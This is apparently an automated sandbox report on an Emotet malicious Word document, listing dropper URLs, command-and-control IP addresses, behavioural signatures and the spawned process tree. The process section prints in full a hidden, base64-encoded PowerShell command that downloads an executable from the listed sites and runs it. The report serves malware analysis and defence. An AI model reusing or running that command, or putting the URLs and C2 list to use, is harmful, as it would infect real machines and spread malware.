Analysis

  • max time kernel
    29s
  • resource
    win10v191014
  • submitted
    10/12/2019, 09:25

General

  • Target

    fc1e45aede20cbf39bb2d752810ea5fb6acb2afe292bdaaa21b94c0b324539a1.doc

  • Sample

    191210-26rq53dhhj

  • SHA256

    fc1e45aede20cbf39bb2d752810ea5fb6acb2afe292bdaaa21b94c0b324539a1

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://masseyatnandina.com/wp-content/ys44/

exe.dropper

http://pickpointgarage.com/protected-array/zb1k8/

exe.dropper

http://evolvedself.com/dir/523arw979/

exe.dropper

http://www.eruquantum.com/scripts/t647/

exe.dropper

http://stlaurentpro.com/25bd/a49/

Extracted

Family

emotet

C2

76.221.133.146:80

104.33.129.244:80

172.90.70.168:8080

96.126.121.64:443

104.236.137.72:8080

172.104.233.225:8080

85.234.143.94:8080

50.28.51.143:8080

190.186.164.23:80

47.146.42.234:80

63.246.252.234:80

80.29.54.20:80

68.183.190.199:8080

46.28.111.142:7080

183.82.97.25:80

87.106.46.107:8080

188.216.24.204:80

186.68.48.204:443

181.198.203.45:443

88.250.223.190:8080

rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fc1e45aede20cbf39bb2d752810ea5fb6acb2afe292bdaaa21b94c0b324539a1.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:4984
  • C:\Windows\system32\SppExtComObj.exe
    C:\Windows\system32\SppExtComObj.exe -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3992
    • C:\Windows\System32\SLUI.exe
      "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
      2⤵
        PID:4548
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABaAGkAegBvAG8AbQBrAHoAYwA9ACcAQQBzAG0AcwBiAG8AeABvAG0AagByACcAOwAkAEQAdQB2AHEAbABzAHoAdwBwAHYAIAA9ACAAJwA2ADAAOAAnADsAJABNAHgAZwB0AGwAZABsAGQAeQA9ACcARwB1AHUAaABuAGoAZwBjAGUAdgB5AHoAJwA7ACQAUQBmAGkAZABnAGkAagB0AHkAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEQAdQB2AHEAbABzAHoAdwBwAHYAKwAnAC4AZQB4AGUAJwA7ACQASAByAGcAYQB4AGkAcwB0AGoAYwBwAGUAZgA9ACcARQB4AHQAZAB4AHYAdQBkAGgAegB6AGwAbgAnADsAJABOAGkAdQB3AGQAeABhAHoAYwA9ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAAbgBFAFQALgBXAGUAQgBDAGwASQBlAE4AdAA7ACQAUgB2AGoAcwBrAHUAeAByAHkAdgB2AD0AJwBoAHQAdABwADoALwAvAG0AYQBzAHMAZQB5AGEAdABuAGEAbgBkAGkAbgBhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AeQBzADQANAAvACoAaAB0AHQAcAA6AC8ALwBwAGkAYwBrAHAAbwBpAG4AdABnAGEAcgBhAGcAZQAuAGMAbwBtAC8AcAByAG8AdABlAGMAdABlAGQALQBhAHIAcgBhAHkALwB6AGIAMQBrADgALwAqAGgAdAB0AHAAOgAvAC8AZQB2AG8AbAB2AGUAZABzAGUAbABmAC4AYwBvAG0ALwBkAGkAcgAvADUAMgAzAGEAcgB3ADkANwA5AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZQByAHUAcQB1AGEAbgB0AHUAbQAuAGMAbwBtAC8AcwBjAHIAaQBwAHQAcwAvAHQANgA0ADcALwAqAGgAdAB0AHAAOgAvAC8AcwB0AGwAYQB1AHIAZQBuAHQAcAByAG8ALgBjAG8AbQAvADIANQBiAGQALwBhADQAOQAvACcALgAiAHMAYABwAEwASQB0ACIAKAAnACoAJwApADsAJABPAHgAaAB2AGQAbABmAGQAYQBhAD0AJwBLAHMAcgBqAGUAbwBmAGEAeABlAHYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEcAaQBrAHMAYQB0AGEAYQBjAGoAeQB0AGkAIABpAG4AIAAkAFIAdgBqAHMAawB1AHgAcgB5AHYAdgApAHsAdAByAHkAewAkAE4AaQB1AHcAZAB4AGEAegBjAC4AIgBkAG8AYABXAE4AbABgAE8AQQBkAEYAaQBgAGwAZQAiACgAJABHAGkAawBzAGEAdABhAGEAYwBqAHkAdABpACwAIAAkAFEAZgBpAGQAZwBpAGoAdAB5ACkAOwAkAE4AbwB6AGIAeAB4AGYAcgA9ACcAUgB4AGsAbwBsAHoAdQBzAGQAdwBpACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAUQBmAGkAZABnAGkAagB0AHkAKQAuACIAbABlAGAATgBHAFQASAAiACAALQBnAGUAIAAyADcANgA3ADgAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBUAEEAYABSAHQAIgAoACQAUQBmAGkAZABnAGkAagB0AHkAKQA7ACQAUQB2AHcAaQBiAGwAagBjAGYAcwBxAD0AJwBDAGQAZAB2AHYAawBlAGEAbQAnADsAYgByAGUAYQBrADsAJABUAGIAZABsAHMAZgB1AGQAPQAnAEsAYgBhAHgAcQBvAGUAbwByAHMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVABzAHAAegBhAG0AegBoAG8AZQBjAD0AJwBaAGkAeQBrAGEAeQBtAHQAdQByAGIAJwA=
      1⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      PID:4668
      • C:\Users\Admin\608.exe
        "C:\Users\Admin\608.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        PID:4392
        • C:\Users\Admin\608.exe
          --3ccade9c
          3⤵
          • Suspicious use of SetWindowsHookEx
          • Executes dropped EXE
          • Suspicious behavior: EmotetMutantsSpam
          PID:3752

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3752-10-0x0000000000670000-0x0000000000687000-memory.dmp

      Filesize

      92KB

    • memory/3752-11-0x0000000000400000-0x00000000004B3000-memory.dmp

      Filesize

      716KB

    • memory/4392-8-0x00000000023A0000-0x00000000023B7000-memory.dmp

      Filesize

      92KB